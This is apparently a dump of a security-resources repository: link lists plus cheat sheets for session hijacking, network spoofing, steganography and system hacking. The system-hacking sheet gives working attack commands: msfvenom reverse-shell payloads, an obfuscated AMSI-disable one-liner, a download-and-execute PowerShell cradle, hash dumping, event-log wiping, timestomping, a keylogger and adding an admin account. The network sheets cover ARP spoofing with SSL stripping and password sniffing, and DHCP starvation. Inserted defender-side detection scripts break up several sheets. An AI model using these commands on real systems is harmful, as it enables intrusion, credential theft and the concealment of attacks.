[HuronOsint](https://github.com/HuronOsint/OsintDistro): Linux distribution for OSINT (version 1.0). In Huron you will find fundamental tools like Maltego or Recon-NG ready to be used or, at least, after a minimum configuration process, a multitude of links to specialized search engines like Shodan, social networks, language tools, software for image data processing and extraction (ExifTools), tools for the creation of idea maps, user name checkers, email anonymizers...
But also tools that allow you to carry out research tasks safely (tracking blockers, Tor browser...) or assist you in the creation of reports and visualization of multimedia material. 8 | * [Kali Linux](https://www.kali.org/): The Most Advanced Penetration Testing Distribution. 9 | * [Parrot OS](https://www.parrotsec.org/): Is a GNU/Linux distribution based on Debian and designed with Security and Privacy in mind. It includes a full portable laboratory for all kinds of cyber security operations, from pentesting to digital forensics and reverse engineering, but it also includes everything needed to develop your own software or keep your data secure. 10 | * [REMnux: A Linux Toolkit for Malware Analysis](https://remnux.org/): It is a Linux toolkit for reverse-engineering and analyzing malicious software. REMnux provides a curated collection of free tools created by the community. Analysts can use it to investigate malware without having to find, install, and configure the tools. 11 | * [Security Onion 2](https://securityonionsolutions.com/software/): Security Onion is a free and open source Linux distribution for threat hunting, enterprise security monitoring, and log management. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes! Security Onion includes Elasticsearch, Logstash, Kibana, Suricata, Zeek (formerly known as Bro), Wazuh, Stenographer, TheHive, Cortex, CyberChef, NetworkMiner, and many other security tools. 12 | 13 | 14 | 15 | --- 16 | 17 | 18 | 19 | ### Virtual machines 20 | * [OSBoxes](https://www.osboxes.org/): Offers you ready-to-use Linux/Unix guest operating systems. 21 | * [Windows XP Lab for VirtualBox (by Lifka)](https://drive.google.com/file/d/18NYLUVYaZ0fuynlzYfl3zjSBXLtQduu1/view?usp=sharing): Contains basic malware analysis tools for static and dynamic analysis (disassemblers, debugging, network analysis, etc.). 
22 | 23 | #### Setup scripts 24 | * [DissectingMalwa.re Lab VMs Setup](https://github.com/f0wl/MalwareLab_VM-Setup): Setup scripts for my Malware Analysis VMs. 25 | 26 | 27 | 28 | --- 29 | 30 | 31 | 32 | ### Vulnerable machines 33 | * [CORS_vulnerable_Lab-Without_Database](https://github.com/incredibleindishell/CORS_vulnerable_Lab-Without_Database) 34 | 35 | 36 | [<- Back to index](README.md) 37 | 38 | --- 39 | ## License 40 | 41 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 42 | 43 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 44 | 45 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /other-links.md: -------------------------------------------------------------------------------- 1 | ## Other links 2 | * [Cyberthreats, viruses, and malware - Microsoft Security Intelligence](https://www.microsoft.com/en-us/wdsi/threats/): Microsoft's threat encyclopedia: descriptions of malware families and the detection names Microsoft Defender uses for them. 3 | * [es1lib](https://es1lib.org/): Part of the Z-Library project. The world's largest e-book library. 4 | 5 | 6 | 7 | --- 8 | 9 | 10 | 11 | ### Blogs 12 | * [0x00-0x00](https://0x00-0x00.github.io/) 13 | * [Amossys - Security Blog](https://blog.amossys.fr/) (French) 14 | * [Adepts of 0xCC](https://adepts.of0x.cc/): A brotherhood of owls praying to the debugger God.
15 | * [Back Engineering](https://back.engineering/) 16 | * [COUNT UPON SECURITY](https://countuponsecurity.com/) 17 | * [Dissecting Malware](https://dissectingmalwa.re/) 18 | * [El Soctano](https://soctano.blogspot.com/) (Spanish) - Discontinued 19 | * [Ero Carrera's blog](http://blog.dkbza.org/) - Discontinued 20 | * [Ferib's Blog](https://ferib.dev/portfolio.php?t=Blog+post) 21 | * [Flu Project](https://www.flu-project.com/) (Spanish) 22 | * [Follow The White Rabbit](https://fwhibbit.es/en/) 23 | * [Follow The White Rabbit – Blog de Seguridad Informática](https://fwhibbit.es/) (Spanish) 24 | * [Google Project Zero](https://googleprojectzero.blogspot.com/) 25 | * [Google Security Blog](https://security.googleblog.com/) 26 | * [Hack Puntes](https://hackpuntes.com/) (Spanish) 27 | * [HackTricks](https://book.hacktricks.xyz/) 28 | * [InQuest Blog](https://inquest.net/blog) 29 | * [lucasg](https://lucasg.github.io/) 30 | * [MalwareAnalysis.co Forums and Blogs](https://malwareanalysis.co/forums/) 31 | * [McAfee blogs](https://www.mcafee.com/blogs/) 32 | * [Microsoft Security Response Center blog](https://msrc-blog.microsoft.com/) 33 | * [Security By Default](http://www.securitybydefault.com/) (Spanish) - Discontinued 34 | * [Objective-See's Blog](https://objective-see.com/blog.html) 35 | * [Security Garage](https://security-garage.com/) (Spanish) 36 | * [Underc0de](https://blog.underc0de.org/) (Spanish) 37 | * [Unit42](https://unit42.paloaltonetworks.com/) 38 | * [UN INFORMÁTICO EN EL LADO DEL MAL](https://www.elladodelmal.com/) (Spanish) 39 | * [UN TAL 4N0NYM0US EN EL PC](http://www.enelpc.com/) (Spanish) - Discontinued 40 | * [welivesecurity by eset](https://www.welivesecurity.com/la-es/category/analisis-malware/) (Spanish) 41 | 42 | 43 | 44 | --- 45 | 46 | 47 | 48 | ### Bug bounty platforms 49 | * [Bugcrowd](https://www.bugcrowd.com/) 50 | * [Firebounty](https://firebounty.com/) 51 | * [Hackerone](https://www.hackerone.com/) 52 | * 
[Intigriti](https://www.intigriti.com/) 53 | * [Yes We Hack](https://www.yeswehack.com/): Crowdsourced security & Vulnerability Disclosure France, Singapore, Switzerland, Germany. 54 | * [Yogosha](https://yogosha.com/) 55 | * [Zerocopter](https://www.zerocopter.com/) 56 | 57 | 58 | 59 | --- 60 | 61 | 62 | 63 | ### Challenges 64 | * [Atenea](https://atenea.ccn-cert.cni.es/) 65 | * [HackTheBox](https://www.hackthebox.eu/) 66 | * [Try Hack Me](https://www.tryhackme.com/) 67 | * [Web Security Academy](https://portswigger.net/web-security) 68 | 69 | 70 | 71 | --- 72 | 73 | 74 | 75 | ### Communities 76 | * [Axial](https://ax1al.com/): Is a community of like minded nerds who focus on reverse engineering, malware analysis and general nerdery regarding to malware, at axial we also focus on various web attack vectors and techniques to leverage our OSINT skills which is accomplished by release of various blogs which range from extremely beginner to an intermediate level which also makes sure to demonstrate the techniques in a broader range, Axial also focuses on various open source based projects dedicated towards the afore mentioned domain, definitely aligning with the offensive, and defensive side of the information security domain. 77 | 78 | 79 | 80 | --- 81 | 82 | 83 | 84 | ### Forums 85 | 86 | * [Indetectables.net](https://indetectables.net/index.php) (Spanish): Malware and undetectabilization techniques forum. 87 | * [Hack Forums](https://hackforums.net/) 88 | * [MalwareAnalysis.co Forums and Blogs](https://malwareanalysis.co/forums/) 89 | * [reddit: Bug Bounty](https://www.reddit.com/r/bugbounty/) 90 | * [reddit: Hacking_Tutorials](https://www.reddit.com/r/Hacking_Tutorials/): A forum for the security professionals and white hat hackers. 91 | * [reddit: OSCP](https://www.reddit.com/r/oscp/): Resource for people preparing for Offensive Security Certified Professional Certification. 
---

### News
* [All Infosec News](https://allinfosecnews.com/)
* [BleepingComputer](https://www.bleepingcomputer.com/news/security/)
* [Dark Reading](https://www.darkreading.com/)
* [Krebs on Security](https://krebsonsecurity.com/)
* [National Cyber Awareness System - Bulletins](https://us-cert.cisa.gov/ncas/bulletins)
* [Schneier on Security](https://www.schneier.com/)
* [Security Affairs](https://securityaffairs.co/wordpress/)
* [The Hacker News](https://thehackernews.com/)
* [Threat post](https://threatpost.com/)

---

### Other directories
* [Hacking Tools](https://en.kali.tools/all/?category): Tools for penetration testing and security audit.
* [simplycyber.io - Free cyber resources](https://www.simplycyber.io/free-cyber-resources): A list of resources for training, conferences, speaking, labs, reading, etc. that are **free** all the time, which cybersecurity professionals with downtime can use to improve their skills and marketability.

---

### Podcasts
* [Cyberwire daily podcast](https://thecyberwire.com/podcasts/daily-podcast)
* [Daily Information Security Podcast ("StormCast")](https://isc.sans.edu/podcast.html): Stormcasts are daily 5-10 minute information security threat updates. The podcast is produced each work day and typically released late in the day, ready for your morning commute.
* [Risky Business](https://risky.biz/)

---

### Services
* [Cock.li](https://cock.li/): Anonymous email.
* [ProtonMail](https://protonmail.com/): Secure email.
---

### Telegram channels
* [crackslatinos](https://t.me/crackslatinos) (Spanish): Telegram channel about reverse engineering, created by Ricardo Narvaja.
* [Cyber Security News](https://t.me/Cyber_Security_Channel)
* [Derecho en la red](https://t.me/derechodelared) (Spanish)
* [Information Security](https://t.me/information_security_channel)
* [Bug Bounty ES](https://t.me/joinchat/C7UlGUXIDvoES-LMwX1Psw) (Spanish): Telegram channel about bug bounty, created by DragonJar.

---

### YouTube Channels
* [securitycreators.video](https://securitycreators.video/)
* [13Cubed](https://www.youtube.com/channel/UCy8ntxFEudOCRZYT1f7ya9Q/videos)
* [247CTF](https://www.youtube.com/channel/UCtGLeKomT06x3xZ2SZp2l9Q/featured)
* [Calle Svensson](https://www.youtube.com/channel/UC0WMQTG_-WIWm8eacM8D8QQ/videos)
* [codingo](https://www.youtube.com/channel/UCUfO02gdMDXgOJWdv_jiLMg/videos)
* [Farah Hawa](https://www.youtube.com/channel/UCq9IyPMXiwD8yBFHkxmN8zg)
* [Hacksplained](https://www.youtube.com/channel/UCyv6ItVqQPnlFFi2zLxlzXA/videos)
* [InsiderPhD](https://www.youtube.com/channel/UCPiN9NPjIer8Do9gUFxKv7A/videos)
* [John Hammond](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw/videos)
* [MalwareAnalysis.co YouTube Channels](https://malwareanalysis.co/community/youtube-channels/)
* [MalwareAnalysisForHedgehogs](https://www.youtube.com/channel/UCVFXrUwuWxNlm6UNZtBLJ-A/videos)
* [Murmus CTF](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A/videos)
* [NetworkChuck](https://www.youtube.com/watch?v=6CnDdXVTxhU)
* [PinkDraconian](https://www.youtube.com/channel/UCmXwpkCXmIKjoRLMsq9I3RA/videos)
* [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)
* [Rana Khalil](https://www.youtube.com/channel/UCKaK-XPQAbznwIISC46b1oA/videos)
* [Reconless](https://www.youtube.com/channel/UCCp25j1Zh9vc_WFm-nB9fhQ/videos)
* [superhero1](https://www.youtube.com/channel/UCm2SwKmx3Ya1HG5RmHR7SCA)

[<- Back to index](README.md)

---
## License

© 2023 [javierizquierdovera.com](https://javierizquierdovera.com)

Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option.

`SPDX-License-Identifier: (Apache-2.0 OR MIT)`

--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
{
  "devDependencies": {
    "all-contributors-cli": "^6.20.0"
  }
}

--------------------------------------------------------------------------------
/session-hijacking-cheat-sheet.md:
--------------------------------------------------------------------------------
## Session hijacking cheat sheet


### Bettercap

#### Using Bettercap to collect all HTTP logins used by routers, servers, and websites that do not have SSL enabled

```sh
bettercap -iface eth0
```
-iface: Specifies the interface to bind to.

```sh
net.probe on
```
This module sends different types of probe packets to each IP in the current subnet so that the net.recon module can detect them.

```sh
net.recon on
```
The net.recon module displays the detected active IP addresses in the network. From here on, this module sniffs network packets in real time.

```sh
set http.proxy.sslstrip true
```
This setting enables SSL stripping in the HTTP proxy.

```sh
set arp.spoof.internal true
```
This setting makes arp.spoof also spoof the local connections among computers of the internal network.
```sh
set arp.spoof.targets [Target IP]
```
This setting selects the target host whose IP address will be spoofed.

```sh
http.proxy on
```
This module starts the HTTP proxy.

```sh
arp.spoof on
```
This module starts ARP spoofing.

```sh
net.sniff on
```
This module performs the sniffing on the network.

```sh
set net.sniff.regexp '.*password=.+'
```
With this setting the sniffer only considers packets whose payload matches the given regular expression (in this case, `.*password=.+`).

#### Using Bettercap to sniff network traffic from HTTPS-based websites

```sh
set http.proxy.sslstrip true
```

--------------------------------------------------------------------------------
/spoofing-network-cheat-sheet.md:
--------------------------------------------------------------------------------
## Spoofing networks cheat sheet

### MAC Flooding
Involves flooding the switch's CAM table with fake MAC address and IP pairs until it is full.

#### Using macof

```sh
macof -i eth0 -n 100
```
-i: Specifies the interface. -n: Specifies the number of packets to be sent.

### DNS Poisoning
Involves tricking a DNS server into believing that it has received authentic information when, in reality, it has not.
### ARP Poisoning
Involves constructing a large number of forged ARP request and reply packets to overload a switch. ARP spoofing succeeds by changing the IP address of the attacker's computer to the IP address of the target computer. A forged ARP request and reply packet find their way into the target's ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends the frames to the attacker's computer, where the attacker can modify them before sending them on to the source machine (User A), in a MITM attack.

#### Using arpspoof
arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch.

```sh
arpspoof -i eth0 -t [IP Address Range]
```
-i: Specifies the network interface.

-t: Specifies the target IP address.

-r: IP to spoof.

### DHCP Attacks
Involves performing a DHCP starvation attack and a rogue DHCP server attack. In a DHCP starvation attack, an attacker floods the DHCP server with a large number of DHCP requests and uses up all the IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to a Denial-of-Service (DoS) condition: valid users cannot obtain or renew their IP addresses, and thus fail to access the network. This attack can be performed with tools such as Yersinia and Hyenae.

#### DHCP Starvation Attack using Yersinia

```sh
yersinia -I
```
-I: Starts an interactive ncurses session.

```sh
[Press F2]
```
F2: Selects DHCP mode.

```sh
[Press x]
[Press 1]
```
x: Lists the available attack options.

1: Starts a DHCP starvation attack.
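The bettercap `arp.spoof` sequence in the session-hijacking sheet above and the MAC flooding, ARP poisoning and DHCP starvation entries in this sheet all leave the same kinds of traces on the wire: one IP answered by two different MACs, or a burst of frames from many source MACs inside a short window. The following is an added example, not part of this repository, of defender-side checks over constructed frame summaries; the `Frame` record, the MAC/IP values and the thresholds are assumptions for the demo, and a real deployment would feed it from a span port or an ARP/DHCP monitor instead of the inline list.

```python
"""Defender-side checks for the layer-2 attacks on this sheet, run over constructed frame summaries."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    """One captured frame reduced to the fields the checks need (assumed record layout;
    the values used below are constructed, not captured from a real network)."""
    ts: float           # capture time in seconds
    src_mac: str        # source MAC of the frame
    kind: str           # "arp_reply", "dhcp_discover" or "other"
    ip: str = ""        # sender protocol address; only meaningful for ARP replies


def detect_arp_conflicts(frames, trusted=None):
    """Return {ip: [macs]} for every IP that more than one MAC claimed in ARP replies.

    `trusted` is an optional static IP->MAC table (gateway, servers); a reply that
    disagrees with it is reported even when only one rogue MAC was seen.
    """
    claims = defaultdict(set)
    for f in frames:
        if f.kind == "arp_reply":
            claims[f.ip].add(f.src_mac.lower())
    for ip, mac in (trusted or {}).items():
        if ip in claims:
            claims[ip].add(mac.lower())
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def distinct_mac_burst(frames, kind, window, threshold):
    """Sliding-window count of distinct source MACs sending frames of `kind`.

    Returns the start time of the first window of `window` seconds in which more than
    `threshold` distinct MACs were seen, or None. A burst of DHCP DISCOVERs from many
    MACs is starvation; a burst of any kind from many MACs on one port is a CAM flood.
    """
    events = sorted((f.ts, f.src_mac.lower()) for f in frames if f.kind == kind)
    start = 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window:
            start += 1
        if len({mac for _, mac in events[start:end + 1]}) > threshold:
            return events[start][0]
    return None


# Constructed capture: a legitimate gateway reply, a host reply, a second MAC claiming
# the gateway's IP, then 300 DHCP DISCOVERs from 300 different MACs within 3 seconds.
SAMPLE = [
    Frame(0.0, "aa:bb:cc:00:00:01", "arp_reply", "10.0.0.1"),
    Frame(0.5, "aa:bb:cc:00:00:02", "arp_reply", "10.0.0.20"),
    Frame(1.0, "de:ad:be:ef:00:01", "arp_reply", "10.0.0.1"),
] + [
    Frame(2.0 + i * 0.01, f"02:00:00:00:{i // 256:02x}:{i % 256:02x}", "dhcp_discover")
    for i in range(300)
]
TRUSTED = {"10.0.0.1": "aa:bb:cc:00:00:01"}   # constructed static entry for the gateway


if __name__ == "__main__":
    print("ARP conflicts:", detect_arp_conflicts(SAMPLE, TRUSTED))
    print("DHCP starvation window starts at:",
          distinct_mac_burst(SAMPLE, "dhcp_discover", window=1.0, threshold=50))
```

The ARP check is what a static ARP entry or Dynamic ARP Inspection enforces on the switch; the burst check is the software equivalent of port security (a limit on MACs per port) and DHCP snooping rate limits. Thresholds belong in configuration: 50 new DHCP clients per second is absurd on an office VLAN but normal on a captive-portal network.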
--------------------------------------------------------------------------------
/steganography-cheat-sheet.md:
--------------------------------------------------------------------------------
## Steganography cheat sheet

### NTFS Streams

#### Hide a file inside another file

```sh
type c:\calc.exe > c:\readme.txt:calc.exe
```
```sh
mklink executable_link.exe c:\readme.txt:calc.exe
executable_link.exe
```

### White Space Steganography using snow

#### Hide a message in a text file

```sh
snow -C -m "Secret message" -p "magic" readme.txt readme2.txt
```

#### Retrieve the message from a text file

```sh
snow -C -p "magic" readme2.txt
```
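snow hides data in runs of spaces and tabs appended to the ends of lines, which is also what gives it away: ordinary text files rarely carry tab/space mixtures at line ends. The following is an added example, not code from this repository or from snow, that reports trailing whitespace per line, flags files where tabbed runs appear on several lines, and normalises the file so that any such payload is destroyed without changing the visible text. The sample strings are constructed by hand, not produced by snow.

```python
"""Finding and removing whitespace steganography (the channel snow uses) in text files."""
import re

TRAILING_WS = re.compile(r"[ \t]+$")


def trailing_whitespace_report(text):
    """Return (line_no, trailing_ws_length, contains_tab) for each line with trailing blanks."""
    report = []
    for no, line in enumerate(text.splitlines(), start=1):
        m = TRAILING_WS.search(line)
        if m:
            ws = m.group(0)
            report.append((no, len(ws), "\t" in ws))
    return report


def looks_like_whitespace_stego(text, min_lines=2):
    """Heuristic: snow appends runs of spaces interspersed with tabs to line ends, so
    trailing whitespace containing tabs on several lines is suspicious, while a single
    stray trailing space left by an editor is not."""
    tabbed = [r for r in trailing_whitespace_report(text) if r[2]]
    return len(tabbed) >= min_lines


def strip_trailing_whitespace(text):
    """Normalise the file. This destroys a whitespace-encoded payload without changing
    what a reader sees, which is the mitigation for documents crossing a trust boundary."""
    cleaned = "\n".join(TRAILING_WS.sub("", line) for line in text.splitlines())
    return cleaned + ("\n" if text.endswith("\n") else "")


# Constructed samples: an ordinary file with one stray trailing space, and the same text
# carrying tab/space runs at the line ends (hand-made, not generated by snow).
CLEAN = "The quick brown fox\njumps over the lazy dog \nand goes home.\n"
STEGO = "The quick brown fox  \t   \t \njumps over the lazy dog\t\t  \nand goes home. \t\n"

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("stego", STEGO)):
        print(name, trailing_whitespace_report(text), looks_like_whitespace_stego(text))
```

For the NTFS stream trick above, the equivalent check is built into Windows: `dir /R` lists alternate data streams next to each file, and PowerShell's `Get-Item -Stream *` on the file does the same.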
--------------------------------------------------------------------------------
/system-hacking-cheat-sheet.md:
--------------------------------------------------------------------------------
## System hacking cheat sheet

### Getting a shell with msfvenom and using PowerUp.ps1 to escalate privileges

#### Generate and encode a payload using msfvenom

```sh
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP Address of Host Machine] LPORT=[Port in the Host Machine] -o [Output Path/shellcode.exe]
```

```sh
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP Address of Host Machine] -f exe > Desktop/Backdoor.exe
```
[msfvenom documentation](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)

#### Upload the shellcode using a local web server

```sh
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp [PATH]/shellcode.exe /var/www/html/share

service apache2 start
```

Download it on the victim machine from `[IP Address of Host Machine]/share/shellcode.exe`.
#### Using the handler in Metasploit to connect to the payload

```sh
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP Address of Host Machine]
set LPORT [Port in the Host Machine]
exploit
```

#### Upload PowerUp.ps1

```sh
upload [PATH]/PowerUp.ps1 PowerUp.ps1
```

#### PowerUp.ps1

##### Check all vulnerabilities

```sh
shell
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
```
[PowerUp.ps1 tutorial](https://recipeforroot.com/advanced-powerup-ps1-usage/)

`bypass` is used to bypass PowerShell's execution policy.

To disable [AMSI](https://docs.microsoft.com/en-us/archive/blogs/poshchap/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi):

```sh
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

###### Execute PowerUp.ps1 without uploading the script

```sh
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1'); Invoke-AllChecks"
```

##### Escalate privileges

```sh
Invoke-ServiceAbuse -Name 'Name of the vulnerable service'
```

### Attempt to bypass Windows UAC protection via the FodHelper registry key using the bypassuac_fodhelper exploit

```sh
use exploit/windows/local/bypassuac_fodhelper
```

If it works, in some cases we can then escalate privileges with techniques like `getsystem`.
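The PowerUp flow above (`powershell -ep bypass`, the `IEX ... DownloadString` cradle, and the string-format and backtick obfuscation used to disable AMSI) is exactly the command-line surface a defender watches in process-creation logs. The following is an added example, not code from this repository or from PowerUp, that scores constructed 4688-style records against those patterns and ranks the ones worth a look; the record layout, weights, hostnames, usernames and the URL are assumptions and placeholders for the demo.

```python
"""Triage of process-creation records for the PowerShell patterns this sheet relies on."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """A process-creation record reduced to what the rules need (Security 4688 and
    Sysmon event 1 both carry these fields); the records below are constructed."""
    host: str
    user: str
    image: str
    cmdline: str


# (rule name, weight, pattern). Weight 1: common in admin scripting, 2: worth a look,
# 3: rarely seen in legitimate automation.
RULES = [
    ("execution-policy-bypass", 2, re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)),
    ("no-profile", 1, re.compile(r"\s-nop(?:rofile)?\b", re.I)),
    ("hidden-window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("download-cradle", 3, re.compile(r"(?:IEX|Invoke-Expression)\b.*(?:DownloadString|Net\.WebClient)", re.I)),
    ("format-operator-obfuscation", 3, re.compile(r'"\{\d+\}(?:\{\d+\})*"\s*-f\b', re.I)),
]
# A backtick inside an identifier ("g`etField") is a no-op that only defeats string
# matching; real escape sequences (`n, `t, `0, `" ...) are excluded so normal scripts do not fire.
BACKTICK_NOISE = re.compile(r"`(?![0abefnrtuv`\"'$])[A-Za-z]")


def classify(ev):
    """List of (rule, weight) hits for one record."""
    hits = [(name, w) for name, w, rx in RULES if rx.search(ev.cmdline)]
    if len(BACKTICK_NOISE.findall(ev.cmdline)) >= 2:
        hits.append(("backtick-obfuscation", 3))
    return hits


def triage(events, threshold=2):
    """Records whose weighted hits reach `threshold`, highest score first."""
    out = []
    for ev in events:
        hits = classify(ev)
        score = sum(w for _, w in hits)
        if score >= threshold:
            out.append({"host": ev.host, "user": ev.user, "score": score,
                        "rules": [name for name, _ in hits]})
    return sorted(out, key=lambda r: -r["score"])


# Constructed records; hosts, users and the URL are placeholders, not real systems.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "CORP\\alice", "powershell.exe",
              "powershell.exe -NoProfile -Command Get-Service"),
    ProcEvent("ws02", "CORP\\bob", "powershell.exe", "powershell -ep bypass"),
    ProcEvent("ws03", "CORP\\bob", "powershell.exe",
              "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://EXAMPLE-PLACEHOLDER/PowerUp.ps1'); Invoke-AllChecks\""),
    ProcEvent("ws03", "CORP\\bob", "powershell.exe",
              'powershell -c ( [TYpE]( "{1}{0}" -F\'F\',\'rE\' ) )."A`ss`Embly"."GET`TY`Pe"("X")'),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Command-line auditing must be switched on for this to see anything: 4688 only records the command line when "Include command line in process creation events" is enabled, and Script Block Logging (event 4104) catches the de-obfuscated script even when the command line is hidden behind an encoded argument.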
### Attempt to elevate privileges with Meterpreter

```sh
getsystem -t 1
```

### Obtain password hashes from the SAM file using Metasploit (root required)

```sh
run post/windows/gather/smart_hashdump
```

It uses the [Named Pipe Impersonation (In Memory/Admin) technique](https://securityintelligence.com/identifying-named-pipe-impersonation-and-other-malicious-privilege-escalation-techniques/).

### Clear the event logs that require administrative or root privileges using Meterpreter (root required)

```sh
clearev
```

### Clear all Event Viewer logs using wevtutil (Windows)

```sh
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
```

```sh
@echo off

FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo All Event Logs have been cleared!
goto theEnd

:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof

:noAdmin
echo Current user permissions to execute this .BAT file are inadequate.
echo This .BAT file must be run with administrative privileges.
echo Exit now, right click on this .BAT file, and select "Run as administrator".
pause >nul

:theEnd
Exit
```

### Securely delete data by overwriting it to prevent its recovery, using the built-in Windows tool (Windows)

```sh
cipher /w:[Drive or Folder or File Location]
```

### Avoid bash history

#### Disable the bash shell from saving the history (Linux)

```sh
export HISTSIZE=0
```

#### Make bash history unreadable (Linux)

```sh
shred ~/.bash_history
```

```sh
shred ~/.bash_history && cat /dev/null > ~/.bash_history
```

### Leave no trace in MACE attributes when reading or modifying files using Meterpreter

#### View the MACE attributes of a file (Windows)

```sh
timestomp [FILE] -v
```

#### Change MACE attributes (Windows)

```sh
timestomp [FILE] -m "mm/dd/yyyy hh:mm:ss"
```

### Keylogger using Meterpreter

#### Start the keylogger

```sh
keyscan_start
```

#### Read the keylogger log

```sh
keyscan_dump
```

### Attempt to gain access to an FTP server with a dictionary attack using THC Hydra

```sh
hydra -L [USERNAMES DICTIONARY] -P [PASSWORDS DICTIONARY] ftp://[IP]
```

### Create a user and grant admin privileges in Windows

```sh
net user Test /Add
net localgroup Administrators Test /Add
```

### Generate and encode a payload for Android using msfvenom

```sh
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[LOCAL HOST] R > payload.apk
```

--------------------------------------------------------------------------------
/tools.md:
--------------------------------------------------------------------------------
## Tools

### Footprinting and reconnaissance
* [ARIN whois database search](https://account.arin.net/public): Locate the network range.
* [awesome-osint](https://github.com/jivoi/awesome-osint): A curated list of amazingly awesome OSINT.
* [BuzzSumo](https://buzzsumo.com/): Find the most shared content for a topic, author, or domain.
* [Censys](https://censys.io/): Full view of every server and device exposed.
* [CeWL](https://github.com/digininja/CeWL): Gathers a wordlist from the target website.
* [DNSRecon](https://github.com/darkoperator/dnsrecon): Reverse DNS lookup.
* [Extract Meta Data](https://citizenevidence.amnestyusa.org/): Gather information from video search engines.
* [exposing.ai](https://exposing.ai/): Check if your Flickr photos were used to build face recognition.
* [Ghost Eye](https://github.com/BullsEye0/ghost_eye): An information-gathering tool written in Python 3. To run, Ghost Eye only needs a domain or IP.
* [Iky I Know You](https://kennbroorg.gitlab.io/ikyweb/): A tool that collects information from an email and shows the results in a nice visual interface.
* [NAPALM FTP Indexer](https://www.searchftps.net/): Gather information from FTP search engines.
* [networkappers](https://networkappers.com/tools/reverse-ip-checker#.X-fOden0nlw): Reverse DNS lookup.
* [Network Tools by YouGetSignal.com](https://www.yougetsignal.com/)
* [NSLOOKUP: look up and find IP addresses in the DNS](http://www.kloth.net/services/nslookup.php/)
* [OSINT_Collection](https://github.com/Ph055a/OSINT_Collection): Maintained collection of OSINT related resources (all free and actionable).
* [osint-suite-tools](https://github.com/Quantika14/osint-suite-tools): Repository of the toolkit for doing OSINT and SOCMINT with Dante's Gates Minimal Version.
* [ReconSpider](https://github.com/bhavsec/reconspider): Framework for scanning IP addresses, emails, websites and organizations, and finding out information from different sources.
* [Reverse IP Lookup](https://reverseip.domaintools.com/): Reverse DNS lookup.
* [Sherlock.py](https://github.com/sherlock-project/sherlock): Search a vast number of social networking sites for a target username.
* [Shodan](https://www.shodan.io/): Search engine for Internet-connected devices.
* [Social Searcher](https://www.social-searcher.com/): Free social media search engine.
* [Thingful](https://www.thingful.net/): A search engine for the Internet of Things.
* [wafw00f](https://github.com/EnableSecurity/wafw00f): Identifies and fingerprints the Web Application Firewall (WAF) products protecting a website.
* [Wayback Machine](https://archive.org/web/)
* [WhoIsHostingThis](https://www.whoishostingthis.com/): Get information about the web host, IP address, name servers and more.
* [Sub3 Suite](https://github.com/3nock/sub3suite): A suite of tools for intelligence gathering and target mapping.

#### Competitive Intelligence Gathering

##### When did this company begin? How did it develop?
* [Business wire](https://www.businesswire.com/portal/site/home/)
* [D&B Hoovers](https://www.dnb.com/products/marketing-sales/dnb-hoovers.html)
* [EDGAR Database](https://www.sec.gov/edgar/searchedgar/companysearch.html)
* [LexisNexis](https://www.lexisnexis.com/en-us/gateway.page)

##### What are the company's plans?
